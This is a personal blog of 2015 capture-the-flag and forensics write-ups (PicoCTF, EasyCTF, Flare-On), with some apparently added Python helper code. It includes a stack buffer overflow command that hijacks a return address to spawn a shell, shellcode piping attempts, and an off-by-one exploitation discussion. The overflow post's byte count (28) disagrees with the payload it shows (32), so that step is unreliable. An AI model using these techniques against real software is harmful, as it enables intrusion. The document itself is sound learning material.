Monday, December 28, 2015

ICS Challenge and SANS Holiday Hack

I did what I could on the SANS ICS Challenge.  I was trying to work on two challenges at one time.  I looked forward to the SANS Holiday Hack Challenge all year.  I'm disappointed with myself though.  I wasn't able to complete either of them.  I guess that I did okay, considering that I don't have a lot of work experience or course experience with either of them.  I'll post the answers that I did get after the challenges are officially over.

I picked up a new book called "The Art of Memory Forensics".  I used it to help me solve some of the ICS Challenge.  I haven't read much of it, because I don't understand much of what it is talking about.  I keep Googling stuff that I don't understand.

I think that I need to get a book that goes into depth about different OS processes, and what is normal.  I can't recognize abnormal because I don't know what normal is.

I like forensics, but I imagine that working in forensics is quite different than this challenge.  I think that when one is working in forensics, they are probably using a lot of automated tools/scripts, and there really isn't a lot of spelunking.  They might have to verify results, but it's not the same.  That's not necessarily a bad thing, though.  It could be interesting, but in a different way.

On the Holiday Hack Challenge, I feel that I'm close on two of the super gnomes, but I just can't get what I'm trying to do to work.  My spouse states that sometimes it's about attitude.  A student might try one thing, and it doesn't work, then the instructor walks up, types the exact same thing, and suddenly it works.  You have to believe that it will work.  It doesn't make much sense to me.  Who would've thought that turning a computer off then on again would solve about 98% of computer problems though?

I learned stuff so quickly to begin with, and now I'm at that point where things are getting more difficult to learn as I progress in knowledge.  I just have to power through this and keep trying.

Tuesday, November 3, 2015

SANS ICS Challenge

SANS is starting a new Challenge soon.  Registration has already started.  The challenge officially starts on November 15th, 2015.  I'm looking forward to it because it has to do with industrial control systems, and it was inspired by the DC3 Digital Forensics Challenges.  It states on the website that it's for all levels of experience as well, so I might have a chance to learn something new.

Here's the link to the SANS ICS Challenge website:

http://icscybersecuritychallenge.com

iPhone 6 Plus "Feature"

My husband and I discovered a "feature" with the iPhone 6 Plus.  One morning, my husband was able to see my phone under his "WiFi" connections as a device that was able to be connected to.  (Note: not under Bluetooth, under WiFi.  He wasn't able to see it before that update.)  The problem: I did not have the "Personal Hotspot" setting turned on on my phone.  I did happen to have my Bluetooth setting turned on so that I could connect to my Fitbit Surge via Bluetooth.  It gets even worse.  Not only was he able to see my device in his connections, he was able to connect to it without even having to type in a password at all.  (It was set to the default password on the Personal Hotspot settings of the phone.)  When he connected to my phone with his phone, it changed MY "Personal Hotspot" setting to On.  Fortunately, they fixed the authentication issue, requiring him to put in a password now; however, when I have my Bluetooth on, he can still see my phone under his WiFi connections, and when he tries to connect, it still changes MY "Personal Hotspot" setting to On.

In the original bug report, I tested it with a device with a different Apple ID, and I was able to see and connect to my phone.  Now the different ID still detects the phone but requires a Bluetooth pairing.  This was with a MacBook Pro, though, not another phone.  I do not know what another phone with a different Apple ID will do, considering that I don't own another phone.  I did think that it was prudent to mention that I submitted this "feature" of another person being able to change my "Personal Hotspot" setting from their device as a bug; however, I was told that as long as it's the same Apple ID on both devices, it was working as intended.  Okay, so how do the devices know that they are on the same ID?  Do they broadcast that information?  Is it stored in the Apple ID database under a devices section?

Secondly, what if someone happened to steal the ID and was near enough to automatically connect to my device?  It doesn't sound like a feature to me.  It sounds like a bug that needs to be resolved.  I'm keeping my Bluetooth on my device turned off.  I don't need to sync my Fitbit Surge that bad.  If you really need to sync something via Bluetooth, I suggest changing that default password on your "Personal Hotspot" setting just in case, and testing it.

Thursday, October 22, 2015

PicoCTF 2014 ExecuteMe & PicoCTF 2014 OBO

I'm working on these in my spare time.  I still haven't solved these.  I think that I know what I'm supposed to do, but I either have the wrong shell code, or I'm getting the syntax wrong.  For ExecuteMe, I think that I'm supposed to send the C program shell code.  That's what the hint says.  So, I tried this (the <shell code here> part actually has shell code in it when I type the command):

./executeme $(python -c 'print "<shell code here>"')

No shell code.

$(python -c 'print "<shell code here>"') | ./executeme

That gets me a shell, but I can't interact with it without getting a segmentation fault.  So then I tried this:

$(python -c 'print "<shell code here>"') & cat flag.txt | ./executeme

I'm getting a command not found error.

So I go on to start reading OBO.  I can go back to Execute Me anytime.  Here is the interesting part of the program for OBO:

int hex_table[256];

void generate_hex_table(void) {
  int i;
  for (i = 0; i <= 256; ++i) {
    hex_table[i] = -1;
  }

  for (i = 0; i <= 10; ++i) {
    hex_table['0' + i] = i;
  }

  for (i = 0; i <= 6; ++i) {
    hex_table['a' + i] = 10 + i;
  }

  for (i = 0; i <= 6; ++i) {
    hex_table['A' + i] = 10 + i;
  }

  // I don't know why, but I was getting errors, and this fixes it.
  hex_table[0] = 0;
}

int read_password(FILE *file, char *password, size_t n) {
  fgets(password, n, file);

  password[strcspn(password, "\n")] = '\0';

I think that OBO stands for Off By One.  As in Off By One error in C programming.  I was looking at the first for loop and noticed that he started variable "i" as 0.  Then he iterates it to 256.  If "i" started at one, that would be fine, but it doesn't.  So, he iterated through the first for loop one too many times.  Then I noticed the null byte (\0) which was tacked on the phrase "password[strcspn(password, "\n")] = '\0';"  If I'm not mistaken, it overwrites the lowest memory byte.  So I was wondering what was useful about that.  I looked at Google, and found an article about a poison null byte.  I also found a SANS white paper describing how to exploit an off by one error.  I haven't tried yet, but from what I understand, one way to exploit it is, you control the address, so you can have the pointer point at a buffer, put shell code into the buffer, and you get shell.  

It's kind of scary how much difference one byte can make.

https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481
http://insecure.org/news/P55-07.txt
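To see what those loop bounds actually do, here is an added Python model of generate_hex_table() (not the challenge's code): it keeps the program's "<=" bounds next to the intended "<" bounds, and uses a hypothetical guard slot at index 256 to stand in for whatever the compiler placed right after hex_table in memory.

```python
# Python model of the challenge's generate_hex_table(): same loop bounds as
# the C code, with a guard slot standing in for the object that follows
# hex_table[255] in memory. Not the challenge's code.

TABLE_SIZE = 256
GUARD = "guard"  # hypothetical sentinel: whatever sits after the array
HEX_DIGITS = "0123456789abcdefABCDEF"


def build_table(off_by_one):
    """Build the lookup table with the program's '<=' bounds (off_by_one=True)
    or the intended '<' bounds (off_by_one=False)."""
    extra = 1 if off_by_one else 0
    table = [None] * TABLE_SIZE + [GUARD]     # index 256 is the guard slot
    for i in range(0, TABLE_SIZE + extra):    # C: i <= 256 writes hex_table[256]
        table[i] = -1
    for i in range(0, 10 + extra):            # C: i <= 10 also maps ':'
        table[ord("0") + i] = i
    for i in range(0, 6 + extra):             # C: i <= 6 also maps 'g'
        table[ord("a") + i] = 10 + i
    for i in range(0, 6 + extra):             # C: i <= 6 also maps 'G'
        table[ord("A") + i] = 10 + i
    # As in the challenge: a NUL byte decodes as digit 0 instead of being rejected.
    table[0] = 0
    return table


def guard_clobbered(table):
    """True when the initialisation loop ran one slot too far."""
    return table[TABLE_SIZE] != GUARD


def extra_accepted_chars(table):
    """Characters outside 0-9a-fA-F that the table treats as hex digits."""
    return [chr(c) for c in range(1, TABLE_SIZE)
            if table[c] >= 0 and chr(c) not in HEX_DIGITS]


def parse_hex(table, text):
    """Decode a hex string through the table; None if any char is rejected."""
    value = 0
    for ch in text:
        digit = table[ord(ch)]
        if digit < 0:
            return None
        value = value * 16 + digit
    return value


if __name__ == "__main__":
    for label, table in (("buggy", build_table(True)), ("fixed", build_table(False))):
        print(label, "guard clobbered:", guard_clobbered(table),
              "extra digits:", extra_accepted_chars(table),
              "parse 'g':", parse_hex(table, "g"))
```

Besides the out-of-bounds write, the loose bounds quietly widen the accepted alphabet to ':', 'G' and 'g', which is the kind of side effect a reviewer should look for whenever a loop condition uses "<=" against an array size.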

Friday, October 16, 2015

PicoCTF 2014 PNG Or Not?

I was given a png image and told that there was some data hidden within.  If you do a Google search on PNG files, you will note that you can hide files in them.  I opened up the image with a hex editor.  Near the bottom of the file, I found 7z, then the words flag.txt.  I know, from reading articles, that I can carve files using headers and footers.  I knew that the header for a 7z file is 37 7A BC AF 27.  I just selected the bytes from that header to the end of the file, copied it onto another sheet in the hex editing program and saved it as a 7z file.  I opened up the flag.txt file using the archive manager, and I got the flag.  EKSi7MktjOpvwesurw0v

Update:  Easier Way:  Command line:

7z x 2pngornot2png.png

Then

cat flag.txt
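An added Python example, not part of the original post: a small PNG chunk walker that finds where the IEND chunk ends and reports any known archive signature in the bytes after it, which is the check the hex-editor search above does by hand.  The sample image is constructed inline, and the 7z signature used is the full six bytes 37 7A BC AF 27 1C.

```python
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Leading bytes of archive formats that are commonly appended to an image.
# The 7z signature is the full six bytes 37 7A BC AF 27 1C.
SIGNATURES = {
    "7z": b"\x37\x7a\xbc\xaf\x27\x1c",
    "zip": b"PK\x03\x04",
    "gzip": b"\x1f\x8b\x08",
}


def png_end_offset(data):
    """Walk the chunk list (length, type, payload, CRC) and return the offset
    just past IEND's CRC, or None if the data is not a well-formed PNG."""
    if not data.startswith(PNG_MAGIC):
        return None
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4
        if ctype == b"IEND":
            return pos if pos <= len(data) else None
    return None


def trailing_files(data):
    """(kind, offset) for each known signature found after the PNG's IEND.
    A valid image has nothing there, so any hit is worth a look."""
    end = png_end_offset(data)
    if end is None:
        return []
    hits = ((kind, data.find(sig, end)) for kind, sig in SIGNATURES.items())
    return sorted((h for h in hits if h[1] != -1), key=lambda h: h[1])


def carve(data, offset, path=None):
    """Bytes from offset to EOF (what the hex-editor copy did); optionally
    written to a file so an archive tool can open it."""
    blob = data[offset:]
    if path:
        with open(path, "wb") as f:
            f.write(blob)
    return blob


def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


# Constructed sample: a 1x1 PNG skeleton with a fake 7z archive appended,
# standing in for the challenge's 2pngornot2png.png.
SAMPLE_PNG = (PNG_MAGIC
              + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
              + _chunk(b"IEND", b""))
SAMPLE_FILE = SAMPLE_PNG + SIGNATURES["7z"] + b"\x00\x04" + b"...flag.txt..."

if __name__ == "__main__":
    for kind, off in trailing_files(SAMPLE_FILE):
        print(f"{kind} data at offset {off}: {len(carve(SAMPLE_FILE, off))} bytes")
```

Run against a real file, `trailing_files(open(path, "rb").read())` gives the same offset the hex editor showed, and `carve(..., path="out.7z")` writes the piece that `7z x` then extracts.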

PicoCTF 2014 Droid App

I was given a droid app that I needed to decompile to find debug information.  Droid apps are really easy to decompile.  The hint said that they could even be decompiled online.  I used Kali Linux and a tool called dex2jar.  Dex2jar does just what it says it does.  It changes dex files into jar files.  Once I had a jar file, I just used java, which was already installed on Kali, to decompile a java class file.

d2j-dex2jar classes.dex -o classes.jar

I opened the jar file using the Archive Manager.  I could see the contents of the jar file.  I navigated the directory structure (mine was picoapp453-picoctf-com-picoapp), then I selected ToasterActivity.class because it looked interesting to me.  Then I used the command line to decompile the class file for me so that I could read it.

javap -c ToasterActivity.class


public void displayMessage(android.view.View);
    Code:
       0: aload_0       
       1: invokevirtual #40;                // Method getApplicationContext:()Landroid/content/Context;
       4: ldc           #42;                // String Toasters don't toast toast, toast toast toast!
       6: iconst_1      
       7: invokestatic  #48;                // Method android/widget/Toast.makeText:(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
      10: invokevirtual #51;                // Method android/widget/Toast.show:()V
      13: ldc           #53;                // String Debug tag
      15: aload_0       
      16: getfield      #34;                // Field mystery:Ljava/lang/String;
      19: invokestatic  #59;                // Method android/util/Log.d:(Ljava/lang/String;Ljava/lang/String;)I
      22: pop           
      23: return 

Note the Debug tag comment on Code 13.  Also note the string on Code 4.  They were looking for the string, "Toasters don't toast toast, toast toast toast!"

So I found debug info.  The flag was in this class as well.  The flag was in this part.

public picoapp453.picoctf.com.picoapp.ToasterActivity();
    Code:
       0: aload_0    
       1: invokespecial #10;                // Method android/support/v7/app/ActionBarActivity."<init>":()V
       4: aload_0    
       5: new           #12;                // class java/lang/String
       8: dup        
       9: bipush        33
      11: newarray       char
      13: dup        
      14: iconst_0    
      15: ldc           #13;                // int 102
      17: castore    
      18: dup        
      19: iconst_1    
      20: ldc           #14;                // int 108
      22: castore    
      23: dup        
      24: iconst_2    
      25: ldc           #15;                // int 97
      27: castore    
      28: dup        
      29: iconst_3    
      30: ldc           #16;                // int 103
      32: castore    
      33: dup        
      34: iconst_4    
      35: ldc           #17;                // int 32
      37: castore    
      38: dup        
      39: iconst_5    
      40: ldc           #18;                // int 105
      42: castore    
      43: dup        
      44: bipush        6
      46: ldc           #19;                // int 115
      48: castore    
      49: dup        
      50: bipush        7
      52: ldc           #20;                // int 58
      54: castore    
      55: dup        
      56: bipush        8
      58: ldc           #17;                // int 32
      60: castore    
      61: dup        
      62: bipush        9
      64: ldc           #21;                // int 119
      66: castore    
      67: dup        
      68: bipush        10
      70: ldc           #22;                // int 104
      72: castore    
      73: dup        
      74: bipush        11
      76: ldc           #15;                // int 97
      78: castore    
      79: dup        
      80: bipush        12
      82: ldc           #23;                // int 116
      84: castore    
      85: dup        
      86: bipush        13
      88: ldc           #24;                // int 95
      90: castore    
      91: dup        
      92: bipush        14
      94: ldc           #25;                // int 100
      96: castore    
      97: dup        
      98: bipush        15
     100: ldc           #26;                // int 111
     102: castore    
     103: dup        
     104: bipush        16
     106: ldc           #27;                // int 101
     108: castore    
     109: dup        
     110: bipush        17
     112: ldc           #19;                // int 115
     114: castore    
     115: dup        
     116: bipush        18
     118: ldc           #24;                // int 95
     120: castore    
     121: dup        
     122: bipush        19
     124: ldc           #23;                // int 116
     126: castore    
     127: dup        
     128: bipush        20
     130: ldc           #22;                // int 104
     132: castore    
     133: dup        
     134: bipush        21
     136: ldc           #27;                // int 101
     138: castore    
     139: dup        
     140: bipush        22
     142: ldc           #24;                // int 95
     144: castore    
     145: dup        
     146: bipush        23
     148: ldc           #14;                // int 108
     150: castore    
     151: dup        
     152: bipush        24
     154: ldc           #26;                // int 111
     156: castore    
     157: dup        
     158: bipush        25
     160: ldc           #16;                // int 103
     162: castore    
     163: dup        
     164: bipush        26
     166: ldc           #28;                // int 99
     168: castore    
     169: dup        
     170: bipush        27
     172: ldc           #15;                // int 97
     174: castore    
     175: dup        
     176: bipush        28
     178: ldc           #23;                // int 116
     180: castore    
     181: dup        
     182: bipush        29
     184: ldc           #24;                // int 95
     186: castore    
     187: dup        
     188: bipush        30
     190: ldc           #19;                // int 115
     192: castore    
     193: dup        
     194: bipush        31
     196: ldc           #15;                // int 97
     198: castore    
     199: dup        
     200: bipush        32
     202: ldc           #29;                // int 121
     204: castore    
     205: invokespecial #32;                // Method java/lang/String."<init>":([C)V
     208: putfield      #34;                // Field mystery:Ljava/lang/String;
     211: return      

I had to change each of those decimals in the comments (the ones after the //) into ASCII characters.  The flag was:  what_does_log_cat_say
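An added Python example (not from the post) that does the decimal-to-character step automatically: it pairs each index push with the following int constant and castore in the javap listing.  The embedded excerpt is the first eight stores from the constructor above; the parser also accepts bipush/sipush for the value load, which javac emits for small ints, so it goes slightly beyond the ldc-only listing shown here.

```python
import re

# Excerpt of the javap listing above: the constructor stores one char per
# (index, value) pair before calling String.<init>([C).
JAVAP_EXCERPT = """
       9: bipush        33
      11: newarray       char
      13: dup
      14: iconst_0
      15: ldc           #13;                // int 102
      17: castore
      18: dup
      19: iconst_1
      20: ldc           #14;                // int 108
      22: castore
      23: dup
      24: iconst_2
      25: ldc           #15;                // int 97
      27: castore
      28: dup
      29: iconst_3
      30: ldc           #16;                // int 103
      32: castore
      33: dup
      34: iconst_4
      35: ldc           #17;                // int 32
      37: castore
      38: dup
      39: iconst_5
      40: ldc           #18;                // int 105
      42: castore
      43: dup
      44: bipush        6
      46: ldc           #19;                // int 115
      48: castore
      49: dup
      50: bipush        7
      52: ldc           #20;                // int 58
      54: castore
"""

# Any instruction that pushes an int: iconst_N, bipush N, sipush N, or an
# ldc whose javap comment gives the constant-pool value.
PUSH_RE = re.compile(
    r"^\s*\d+:\s+(?:iconst_(\d)|bipush\s+(\d+)|sipush\s+(\d+)"
    r"|ldc\s+#\d+;\s*//\s*int\s+(\d+))")
STORE_RE = re.compile(r"^\s*\d+:\s+castore\b")


def recover_char_array(listing):
    """Rebuild the char[] a constructor fills element by element.
    castore pops (array, index, value); the two most recent int pushes
    are therefore the index and the value for that store."""
    chars = {}
    pending = []
    for line in listing.splitlines():
        m = PUSH_RE.match(line)
        if m:
            pending.append(int(next(g for g in m.groups() if g is not None)))
            continue
        if STORE_RE.match(line) and len(pending) >= 2:
            index, value = pending[-2], pending[-1]
            chars[index] = chr(value)
            pending = []
    # Order by index so out-of-order stores still come out right.
    return "".join(chars[i] for i in sorted(chars))


if __name__ == "__main__":
    print(recover_char_array(JAVAP_EXCERPT))
```

Feeding the whole constructor listing from `javap -c` through the same function yields the full mystery string; the excerpt here stops at "flag is:".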

PicoCTF 2014 Cyborg Secrets

This one was extremely easy.  I had to find a password for a password-protected binary relating to a cyborg's defense mechanisms in the game.  I had to find the shut down code for the cyborg.  I just opened the executable in a hex editor, and searched for a password.  There was a debug password, and a to-do note stating that they need to remove the debug password.  LOL  The debug password was: 2manyHacks_Debug_Admin_Test.  And the shut down code was: 403-shutdown-for-what.

PicoCTF 2014 Overflow 2

I actually had this one, and a few others, solved a while ago.  The VM that they were stored on got corrupted, so I lost all those files.  Good thing that it was a VM and not my host machine that got corrupted.  This is how I solved Overflow2.

This is a C program that is vulnerable to a buffer overflow vulnerability because of the strcpy function.  In order to exploit this vulnerability, I have to change control of the execution of the program to myself by overwriting the return address so that it sends the function pointer to the address of the give_shell function instead of the next address on the stack.  In the command prompt, I found the address by typing objdump -d overflow2 | grep "shell".  The -d option of objdump disassembles the program and gives me a list of functions.  I only want one function, though, the give_shell function, so I pipe objdump into another command called grep which searches for the "shell" string, and only displays the functions with the word "shell" in them.  The address of the give_shell function is: 080484ad.  The buffer is 16 characters long.  The instruction pointer is 4 bytes long.  The base pointer is 4 bytes long.  The return address is 4 bytes long.  So, to figure out how many bytes I need to overwrite, I add the amount of bytes for the instruction pointer, the amount of bytes for the base pointer, the amount of bytes for the buffer, and the amount of bytes for the return address that I want to overwrite.  So, it's 16 + 4 + 4 + 4 = 28.  Then I add the address that I want the return address pointer to point to.  I'm using python, because I want to be able to tell it to print hex characters for me for the address.  So the command is now: ./overflow2 $(python -c 'print "A"*32 + "\xad\x04\x84\x08"')  I have to type the address backwards because the server understands things in Little Endian format.  Once I type this into the command prompt, I get a shell prompt.  Then I type cat flag.txt, and get the flag, controlling_%eip_feels_great.

Saturday, October 10, 2015

EasyCTF

Looking at this one for my 11-year-old.  It's a high school competition.  The home page states that it is October 31st - November 7th, 2015.  It's strange because the e-mail that I got about it states that it's October 3rd - 10th.  Maybe people who are interested should e-mail the creators to find out?  The website is https://www.easyctf.com.  The website has nice external resources under the "Learn" part of the menu.

I'm trying to teach my son to be ethical about hacking, meaning that he should obey the laws and have permission before doing any kind of pen-testing.  I think that these CTFs are a good way to have fun, and learn, while being honest and ethical at the same time.

I looked at the sample problems under the "About" part of the menu and solved them for fun.  I showed my son the solutions.  (If he tries this ctf, I will not help him beyond giving him search parameters for Google.)

The first sample was an easy substitution cipher.  I've seen plenty of these, so I recognized it immediately.  I think that pretty much anyone over the age of 5 can see these for what they are.

thisis a simple substitution cipher. flag is now_go_sign_up_and_do_the_real_challenges.

The second sample problem was a reversing problem.

x = raw_input("enter the password: ");
y = "";
for c in x:
    y += chr(ord(c) ^ 14);
    if y == "ko}wmzhugQocQoQhbois":
        print "congratz the flag is " + y;
    else:
        print "nope";

They were asking for the flag.  If I read the program properly, the flag is the contents of the variable x.  In the program it says, print "congratz the flag is" and the variable y.  The contents of variable y were ko}wmzhugQocQoQhbois.  You get that by bitwise XORing each character of x with the decimal number 14.  I was curious about what password one would have to enter to get that flag placed into variable y, so I wrote a small python program to see.


Then I ran the program in a command prompt:  python reverse.py

I thought that the sample problems actually advertising the challenge were kind of cute.  If you are new to cyber security and want to learn about it, I suggest you give this challenge a try.  Only middle school and high school students will be eligible for any rewards, though.

Wednesday, October 7, 2015

SANS CyberTalent Immersion Academy for Women

Hi.  I've been busy doing the SANS Cyber Defense Challenge.  I ended up in 6th place overall.  Not bad for a stay-at-home mom.  I just recently got hired for a temporary position with a possibility of getting hired on full-time if I do a decent job.  But enough about my life. 

I know about an exciting opportunity for women in IT.  SANS is offering free SANS training to qualifying participants.  It's called the SANS CyberTalent Immersion Academy for Women.  If you are a college junior, senior, or are a recently graduated woman, I encourage you to apply.  It's completely free for anyone that is accepted so long as they agree to work for two years for a company sponsoring them.  Accepted applicants also get the certification attempts that go along with the training.  For more information about this program, visit:  https://www.sans.org/cybertalent/immersion-academy/programs#womens-academy

Friday, September 25, 2015

SANS Pen Testing Twitter Contest

I didn't finish the flare-on challenge.  I'm reading the write-ups.  I actually feel like I learn quite a bit from reading the write-ups, and other people's solutions.  There is usually more than one method to solve a problem, and some methods are more efficient than others.

I'm in the midst of the SANS Cyber Defense Challenge.  I'm currently in 3rd place.  That may change soon because there are some really competitive and brilliant people in this challenge.  I was happy to be in the top fifty.  I never in my wildest dreams thought that I would be this close.  The first and second place winners have a chance to go to San Diego for a couple of days for a chance to be named Ultimate Cyber Defender 2015.

The SANS Pen Testing blog just released a new contest today.  It's a simple Twitter contest.  All you have to do is take a photo of yourself wearing a NetWars shirt, OR with a coin or SANS sticker, OR with any item associated with SANS, OR with a SANS book, OR with the pen-testing blog website in your browser window and tweet it to @SANSPenTest with the hashtag #SANSHackFest.  There is a chance to win free two day admission to HackFest on Nov 16th and 17th.  You can enter as much as you like between 9-25-2015 and 10-02-2015.  You can check that out at: https://pen-testing.sans.org/blog/pen-testing/2015/09/25/2015-sans-pen-test-hackfest-twitter-contest

Tuesday, September 1, 2015

Flare-On Challenge Part One Solution

Update:  I mistakenly thought that the challenge answers were due today.  It's actually not due until the 8th, which is next week.  Fortunately, I don't think that this answer will affect the outcome.  I will be more careful about posting solutions in the future.  I apologize to the creators of the Flare-On Challenge.  I will continue to work on the challenge then.  :)

The Flare-On Challenge 2015 is a challenge created by FireEye about digital forensics and reverse engineering.  In order to complete the challenge, one must find a series of e-mail addresses and send a message to those addresses to get each part of the challenge.  They warned that there is live malware in this challenge.  I used a SIFT VM and IDA Pro (Free version) for this part of the challenge.  IDA Pro (Free version) ran just fine on WINE.

I did not complete this challenge.  I solved one question, which is more than I expected to solve because I have hardly any prior experience in reverse engineering.  The only reverse engineering that I have done is for previous challenges.  I hope that they release the rest of the files in this challenge, because I tend to learn better by doing something, than seeing or hearing about it.

For the first Flare-On Challenge of 2015, I was given a program, i_am_happy_you_are_to_playing_the_flareon_challenge.exe that simply asked me to find a password.

I looked at the previous flare-on challenge answers to see if there was a similar problem to this one.  There was.  It was Challenge 3: Shellolololol.  I learned that data starting at address 0x401000 can be interesting because according to the solutions from last year at www.fireeye.com/blog/threat-research/2014/11/the_flare_on_challen.html, "it is the beginning of the code section, which commonly is where the beginning of any user-written code exists."

I began looking at that section of code.  I'm not familiar with assembly, but after looking at the code for a little bit, and using Google to understand what each instruction did, I saw:

.text:0040104D loc_40104D:                             ; CODE XREF: start+61 j
.text:0040104D                 mov     al, byte_402158[ecx]
.text:00401053                 xor     al, 7Dh
.text:00401055                 cmp     al, byte_402140[ecx]
.text:0040105B                 jnz     short loc_40107B
.text:0040105D                 inc     ecx
.text:0040105E                 cmp     ecx, 18h
.text:00401061                 jl      short loc_40104D

I have studied a little C and Java, so I thought that when the program read in a person's response to "Enter the password", that it needed to put that information in a buffer.  The buffer is at address 0x402158.  I confirmed that statement by using the jump/jump to address functionality of IDA to jump to address 0x402158 and noted that all of the items in that buffer are set to 0.  I didn't run the program and put anything in there, so there aren't any characters to put in those slots.  The machine has to reserve a place in memory for them though, so it starts the items in the buffer at 0x402158 at 0.  It's called initialization.  Initialization of variables, or a buffer in this case, is recommended in most of the programming languages that I have studied.

I noted from the cmp statement that the password was probably stored starting at the address 0x402140.  Cmp in assembly, in this case, means to compare the value in al with the byte stored at 0x402140.  When you use cmp in assembly, it affects two flags, the zero flag (ZF) and the carry flag (CF).  If the byte in the 0x402158 address matches the byte in the 0x402140 address, then it sets the zf flag to 0. Otherwise, it sets the zf flag to 1.  In this program's case, it jumps to the "You are a failure" part of the program if the zf is not equal to zero.

If you look later in the code above, it has a jl statement.  What that means is that the program is telling the machine to jump to location 0x40104D if ecx is less than 18h.  That means that the program is using a loop.  The program increments the value in ecx by 1.  ECX starts at 0.  ECX is incrementing the address where the bytes of the password are being stored.  To break out of the loop, the assembly says to compare ecx with 18h.  The last password byte is at 0x402157.  So it says that if ecx has incremented to 18 hexadecimal, which it would if it started at 0x402140 and ended at 0x402158, then you need to break out of this loop, so it doesn't follow the next jump instruction once ecx = 18h.

What the program is doing is xoring each byte in the buffer with the hex character 7D, then comparing each byte in the buffer with each byte of the password.  I used the jump/jump to address function of IDA to jump to 0x402140 to confirm my analysis.  I noticed a strange line of characters.

1F
8
13h
13h
4
22h
0Eh
11h
4Dh
0Dh
18h
3Dh
1Bh
11h
1Ch
0Fh
18h
50h
12h
13h
53h
1Eh
12h
10h

The similar example from last year showed exactly what to do. All I had to do to reverse engineer this password obfuscation was xor each byte of the password at address 0x402140 with the hex character 7Dh, and I had my answer.  I could just take each byte and manually xor each byte, and then convert those values from hex to ascii using one of the many tools online, but there is a faster way.  It's called scripting.  I purchased a book called The IDA Pro Book:  The Unofficial Guide to IDA Pro by Chris Eagle, which I highly recommend.  It addressed scripting for IDA in it.  Even though the name says, "Pro", it covers the difference between the IDA Pro and Free versions, and how one could effectively use the free version.  It also shows excellent examples of assembly language, for those, like me, who don't have a lot of experience with assembly.  I'm currently about halfway through the book, but plan on finishing it as soon as I can.  (I am not getting paid to tell you about this book.)

The actual script that I used below, I found by using Google.  It was at www.stackoverflow.com/questions/13495538/ida-pro-string-function.  Thanks user1354557 for having the insight to realize that not everyone has IDA Pro.  Here is the script that I modified to fit my needs:

Version on Stack Exchange:
auto addr;
auto b;
addr = 0x00401000;
while(1){
    b = Byte(addr) ^ 0x1F;
    PatchByte(addr, b);
    if (b == '\0'){
        break;
    }
    addr = addr + 1;
}

I didn't need to start at that address, so I changed the starting address.  I was xoring with the 7Dh byte, not 1Fh.  I didn't care for depending on a nul terminator to break out of the loop.  I preferred stopping at the last address in the password byte addresses, because other code may be overwritten if there is no nul terminator to break out of the loop.  So here is my modified version:

Modified version:
auto addr;
auto b;
addr = 0x402140;
while(1){
    b = Byte(addr) ^ 0x7D;
    PatchByte(addr, b);
    if (addr == 0x402157){
        break;
    }
    addr = addr + 1;
}

The byte at 402140 didn't automatically show a comment with a "b".  There was already a cross reference comment in that spot, so maybe that had something to do with it?  However, the script properly changed the value. So, all I had to do was to convert that one hex value into an ascii character, and add my own comment.  Update:  Used the right click command "undefine" at the address 0x402140, and it showed the "; b" comment.  I guess that IDA thought that that character was something else, not a character.  Right-clicking on it again gives the option of converting all the characters to a string.

62h ; b
75h ; u
6Eh ; n
6Eh ; n
79h ; y
5Fh ; _
73h ; s
6Ch ; l
30h ; 0
70h ; p
65h ; e
40h ; @
66h ; f
6Ch ; l
61h ; a
72h ; r
65h ; e
2Dh ; -
6Fh ; o
6Eh ; n
2Eh ; .
63h ; c
6Fh ; o
6Dh ; m

The password is:
bunny_sl0pe@flare-on.com

I sent a message to that e-mail and got the next challenge.
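An added Python example, not the author's reverse.py or the IDC script above: one single-byte XOR decoder applied to both the EasyCTF sample (key 14 against ko}wmzhugQocQoQhbois) and the 24 bytes listed at 0x402140 (key 7Dh), plus two ways to recover the key when it is not sitting in the disassembly: from a known plaintext tail such as ".com", or by listing every key whose output is entirely printable.

```python
import string

# Printable ASCII minus control whitespace: what a decoded password or
# e-mail address is expected to look like.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def xor_decode(data, key):
    """Single-byte XOR. XOR is its own inverse, so the same call obfuscates
    and recovers."""
    return bytes(b ^ key for b in data)


def key_from_known_suffix(data, suffix):
    """Derive the key from a known plaintext tail (e.g. b".com" for an e-mail
    address) and confirm it is consistent across the whole suffix."""
    if not suffix or len(suffix) > len(data):
        return None
    tail = data[-len(suffix):]
    key = tail[0] ^ suffix[0]
    return key if all(c ^ key == p for c, p in zip(tail, suffix)) else None


def candidate_keys(data, alphabet=PRINTABLE):
    """Keys whose output is entirely printable: a short list to try when no
    known plaintext is available."""
    return [k for k in range(256) if all((b ^ k) in alphabet for b in data)]


# The EasyCTF sample compares chr(ord(c) ^ 14) against this string.
EASYCTF_TARGET = b"ko}wmzhugQocQoQhbois"
# The 24 bytes IDA showed at 0x402140 in the Flare-On binary.
FLARE_BYTES = bytes([0x1F, 0x08, 0x13, 0x13, 0x04, 0x22, 0x0E, 0x11,
                     0x4D, 0x0D, 0x18, 0x3D, 0x1B, 0x11, 0x1C, 0x0F,
                     0x18, 0x50, 0x12, 0x13, 0x53, 0x1E, 0x12, 0x10])


def easyctf_password():
    return xor_decode(EASYCTF_TARGET, 14).decode("ascii")


def flare_password():
    return xor_decode(FLARE_BYTES, 0x7D).decode("ascii")


if __name__ == "__main__":
    print("EasyCTF password:", easyctf_password())
    print("Flare-On key from '.com':", hex(key_from_known_suffix(FLARE_BYTES, b".com")))
    print("Flare-On password:", flare_password())
    print("keys giving all-printable Flare-On output:", candidate_keys(FLARE_BYTES))
```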

Tuesday, August 4, 2015

Flare-On Challenge and SANS Cyber Defense Challenge

